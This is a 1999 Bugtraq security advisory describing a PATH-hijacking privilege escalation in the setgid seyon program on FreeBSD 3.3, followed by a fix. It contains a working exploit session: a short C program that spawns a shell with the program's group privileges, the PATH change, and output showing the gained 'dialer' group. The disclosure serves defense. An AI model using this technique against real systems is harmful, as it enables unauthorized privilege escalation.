Bugtraq mailing list archives

FreeBSD 3.3's seyon vulnerability

From: btellier () USA NET (Brock Tellier)
Date: Mon, 8 Nov 1999 20:50:38 MST


Greetings,

In preparing for this advisory release, I checked for "seyon" vulnerabilities
in the bugtraq archives.  I found that the exploit I had developed had already
been discussed in May 1997.  However, this does not change the fact that the
current version of FreeBSD still ships a vulnerable version with vulnerable
privs.  I believe this is still worth noting.  Here is my advisory as it was
to be published before the previous vulnerability came to light.

OVERVIEW
A vulnerability exists in seyon v2.14b which will allow any user to upgrade
his or her privs to those with which seyon runs.

BACKGROUND
This advisory is based entierly off the work I've done on FreeBSD 3.3-RELEASE
and seyon 2.14b which is included on the FreeBSD installation CD as an
"additional package".  When installed via sysinstall, seyon's permissions are
sgid "dialer".  Different versions of seyon and different packages of 2.14b
may have different default permissions.

DETAILS
Upon startup, seyon executes the programs "seyon-emu" and "xterm".  The paths
to these programs are not absolute and are gotten from the users's $PATH.  By
adding a directory we have write access to in our $PATH and putting our own
version of seyon-emu or xterm, we can make seyon run this program with egid
dialer.  

EXPLOIT

bash-2.03$ uname -a; id; ls -la `which seyon`
FreeBSD  3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999    
jkh () highwing cdrom com:/usr/src/sys/compile/GENERIC  i386
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
-rwxr-sr-x  1 bin  dialer  88480 Sep 11 00:55 /usr/X11R6/bin/seyon
bash-2.03$ cat > seyonx.c
void main () {
  setregid(getegid(), getegid());
  system("/usr/local/bin/bash");
}
bash-2.03$ gcc -o seyon-emu seyonx.c
bash-2.03$ PATH=.:$PATH
bash-2.03$ seyon
bash-2.03$ id
uid=1000(xnec) gid=68(dialer) groups=68(dialer), 1000(xnec)
bash-2.03$ 

FIX
Simply chmod 750 `which seyon` and add selected users to the "dialer" group.

Brock Tellier
UNIX Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1

Current thread:

Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions, (continued)
- - Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Mark (Nov 08)
    - Insecure handling of NetSol maintainer passwords jlewis () LEWIS ORG (Nov 08)
    - flaw in dmesg under Solaris echo8 (Nov 09)
    - Re: Insecure handling of NetSol maintainer passwords Jefferson Ogata (Nov 09)
    - Re: Insecure handling of NetSol maintainer passwords pedward () WEBCOM COM (Nov 10)
    - Re: Insecure handling of NetSol maintainer passwords Trevor Schroeder (Nov 10)
    - networksolutions CRYPT-PW salt (was: Re: Insecure handling of NetSol maintainer passwords) Jefferson Ogata (Nov 10)
    - [Cobalt] Security Advisory - cgiwrap Jeff Bilicki (Nov 09)
    - Re: MS Outlook alert : Cuartango Active Setup - Workaround Instructions Andy Helsby (Nov 09)
  - Remote DoS Attack in TransSoft's Broker Ftp Server v3.5 Vulnerability Ussr Labs (Nov 08)
  - FreeBSD 3.3's seyon vulnerability Brock Tellier (Nov 08)
    - Re: FreeBSD 3.3's seyon vulnerability Bill Fumerola (Nov 09)
  - Re: MS Outlook alert : Cuartango Active Setup Bronek Kozicki (Nov 09)
- IE4/5 "file://" buffer overflow UNYUN (Nov 08)
  - Re: IE4/5 "file://" buffer overflow Mikael Olsson (Nov 09)
  - (no subject) Ejovi Nuwere (Nov 09)
  - Remote DoS Attack in QVT/Term 'Plus' 4.2d FTP Server Vulnerability Ussr Labs (Nov 09)
  - Multiples Remotes DoS Attacks in Artisoft XtraMail v1.11 Vulnerability Ussr Labs (Nov 10)
- Re: Guestbook.pl, sloppy SSI handling in Apache? (VD#2) Chuck Phillips (Nov 07)